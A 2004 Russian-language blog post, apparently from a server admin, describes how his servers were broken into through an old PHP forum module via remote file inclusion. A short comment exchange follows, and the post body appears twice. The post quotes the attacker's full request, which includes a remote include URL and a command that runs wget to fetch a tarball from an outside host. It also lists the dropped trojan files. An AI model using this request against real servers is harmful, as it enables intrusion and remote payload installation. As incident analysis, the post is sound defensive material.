![[personal profile]](https://www.dreamwidth.org/img/silk/identity/user.png){kind=small}
longotЯ таки нашел как ломают мои сервера! =)
Все оказалось до банального просто.
У одного из пользователей установлен както форум. Толи phpbb толи phpnuke. Причем достаточно старый и достаточно дырявый. Хакерам оставалось сделать только следующее, написать хитрый запрос который выполняет на сервере команду wget (вот в том что она всетаки выполняетсья я виноват сам)
Тоесть запрос получаеться вида
/modules/coppermine/themes/default/theme.ph
p?THEME_DIR=http://www.deathwar.org/root.txt?&cmd=cd%20/var/tmp;wget%20ek0y.com/ekoy/eko.tar.gz
Причем сам файл root.txt тоже не простой =)
он то и выполняет команду. Нужно будет поикать, как же они этот файл записывают. Думаю что не сложнее чем с запросом.
В итоге мы имеем:
server:/var/tmp/vi.recover/...# ls -a
./ ../ llc* wtc*
Вот это и есть те самые трояны, либо части осла.
Далее дело техники - зайти на сервер и закачать кучу всякой всячены.
Все оказалось до банального просто.
У одного из пользователей установлен както форум. Толи phpbb толи phpnuke. Причем достаточно старый и достаточно дырявый. Хакерам оставалось сделать только следующее, написать хитрый запрос который выполняет на сервере команду wget (вот в том что она всетаки выполняетсья я виноват сам)
Тоесть запрос получаеться вида
/modules/coppermine/themes/default/theme.ph
p?THEME_DIR=http://www.deathwar.org/root.txt?&cmd=cd%20/var/tmp;wget%20ek0y.com/ekoy/eko.tar.gz
Причем сам файл root.txt тоже не простой =)
он то и выполняет команду. Нужно будет поикать, как же они этот файл записывают. Думаю что не сложнее чем с запросом.
В итоге мы имеем:
server:/var/tmp/vi.recover/...# ls -a
./ ../ llc* wtc*
Вот это и есть те самые трояны, либо части осла.
Далее дело техники - зайти на сервер и закачать кучу всякой всячены.
![[identity profile]](https://www.dreamwidth.org/img/silk/identity/openid.png){kind=small}
no subject
Date: 2004-09-14 05:49 am (UTC)в схеме "твоего" взлома я не вижу получения root`а.
no subject
Date: 2004-09-14 06:18 am (UTC)Но таким образом они только закачивают на сервер осла, возможно что с трояном.
Ищу дальше...